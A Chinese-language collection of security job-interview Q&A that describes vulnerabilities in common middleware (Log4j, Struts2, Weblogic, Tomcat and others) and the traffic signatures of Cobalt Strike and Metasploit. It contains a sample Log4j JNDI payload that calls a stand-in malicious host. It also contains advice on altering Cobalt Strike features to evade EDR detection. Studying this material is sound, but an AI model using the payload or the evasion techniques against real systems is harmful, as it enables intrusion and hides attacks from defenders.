网安面经收集

Appearance

Struts2

  1. 常见特征

    • :Struts2漏洞通常表现为通过特殊构造的HTTP请求触发的远程代码执行,通常涉及OGNL表达式注入。

  2. 漏洞原理

    • :Struts2的漏洞主要是由于在处理用户输入时没有进行充分的验证和过滤,导致OGNL表达式被执行,从而允许攻击者执行任意代码。

Log4j

  1. 流量特征

    • :Log4j漏洞的流量特征通常表现为JNDI查找请求,例如ldap://rmi:// URI,试图加载远程代码;常常在请求头 cookie 或在请求头其他字段

  2. 如何知道它是否攻击成功

    • :可以通过日志文件、异常堆栈跟踪、异常行为或网络流量中是否存在恶意代码的响应来判断攻击是否成功。

  3. 原理

    • :由于Log4j2组件在处理程序日志记录时存在JNDI注入缺陷,未经授权的攻击者利用该漏洞,可以向服务器发送恶意的数据,触发Log4j2组件的缺陷,实现目标服务器的任意代码执行,获得目标服务器权限。

  4. JDNI注入调用了哪些协议

    • :JDNI注入通常调用LDAP、RMI、DNS和CORBA等协议。

  5. Log4j的payload说一下

    • :Log4j的payload通常是构造一个恶意字符串,其中包含JNDI查找的URI,例如${jndi:ldap://malicious.com/a},该字符串在日志记录时触发JNDI查找,导致恶意代码执行。

  6. Log4攻击链不能回显怎么办?

    • :如果Log4j攻击链不能回显,可以通过其他途径确认攻击是否成功,如查看目标系统的日志文件、异常行为,或使用反向Shell等技术手段获取目标系统的信息。

IIS

  1. 远程代码执行

    • :IIS的远程代码执行漏洞通常涉及到未修补的安全漏洞,允许攻击者通过网络直接在IIS服务器上执行任意代码。

  2. 解析漏洞

    • :IIS的解析漏洞通常涉及到文件扩展名的处理方式,攻击者可以通过构造特定的请求绕过安全限制,从而执行恶意代码。

  3. PUT漏洞

    • :PUT漏洞是指IIS服务器错误配置允许使用HTTP PUT方法上传文件,攻击者可以通过上传恶意文件(如Web Shell)实现远程代码执行。

  4. 短文件名猜测

    • :短文件名猜测攻击利用Windows文件系统的短文件名(8.3命名规则),通过猜测短文件名访问隐藏或未授权的文件。

Apache

  1. 解析漏洞

    • :Apache解析漏洞涉及服务器对URL路径的解析方式错误,可能导致目录穿越或任意文件读取等问题。

  2. 目录遍历

    • :目录遍历漏洞允许攻击者通过构造特殊的URL请求访问服务器上的任意文件,可能导致敏感信息泄露。

Nginx

漏洞

  1. 文件解析

    • :Nginx的文件解析漏洞通常涉及对特定文件类型的处理错误,可能被攻击者利用执行任意代码。

  2. 目录遍历

    • :Nginx目录遍历漏洞允许攻击者访问服务器上的任意目录,读取敏感文件。

  3. 目录穿越

    • :目录穿越漏洞允许攻击者通过构造特定请求访问服务器上的任意文件,通常通过../来访问上级目录。

  4. CRLF注入

    • :CRLF注入漏洞允许攻击者通过注入回车换行符(CRLF)操纵HTTP响应头,可能导致HTTP响应拆分攻击。
使用

怎么查看日志?

  • :查看Nginx日志可以通过访问Nginx安装目录下的日志文件,如/var/log/nginx/access.log/var/log/nginx/error.log

JBOSS

  1. 反序列化漏洞

    • :JBOSS的反序列化漏洞允许攻击者通过发送恶意数据包,触发反序列化操作,执行任意代码。

  2. WAR后门文件部署

    • :攻击者可以通过上传恶意的WAR文件到JBOSS服务器,部署后该文件可以作为后门执行任意命令。

Weblogic

漏洞

  1. 反序列化漏洞

    • :Weblogic的反序列化漏洞允许攻击者通过发送恶意数据触发反序列化操作,导致远程代码执行。

  2. SSRF任意文件上传

    • :Weblogic存在的SSRF漏洞可以被攻击者利用,通过构造特定请求访问内部资源,甚至上传恶意文件。

  3. war后门文件部署

    • :攻击者可以通过上传恶意的WAR文件到Weblogic服务器,部署后该文件可以作为后门执行任意命令。

  4. 默认端口

  • :7001
使用
  1. weblogic权限绕过
    • :通过静态资源来绕过权限验证,防止被重定向到登录界面;通过请求.portal,控制处理的Servlet是渲染UI的MBeanUtilsInitSingleFileServlet;通过编码后的../,让最终渲染的模板是console.portal

Tomcat

漏洞

  1. 远程代码执行

    • :Tomcat的远程代码执行漏洞通常涉及未修补的安全漏洞或配置错误,允许攻击者在服务器上执行任意代码。

  2. war后门文件部署

    • :攻击者可以通过上传恶意的WAR文件到Tomcat服务器,部署后该文件可以作为后门执行任意命令。
使用
  1. BCEL不出网打法
    • :BCEL攻击利用Tomcat的BasicDataSource链编译POC,将POC的class字节码转化为BCEL,然后发送payload。

CS

  1. 流量特征

    • :基本特征包括心跳包;请求特征包括下发的指令、URL路径、老版本固定的UA头;源码特征包括checksum8(92L 93L)。如果进行二次开发后的CS,可以提取样本进行分析。

  2. 上线CS遇到深信服的EDR怎么办?如何进行特征的修改

    • :可以通过修改特征来规避EDR检测,例如改变心跳包的频率和内容,修改URL路径和UA头,进行代码混淆和加密,使用无签名的二进制文件等。

MSF

  1. 流量特征
    • :流量特征包括默认使用4444端口作为反向连接端口;数据包中通常包含特定字符串,如"meterpreter"和"revshell"等。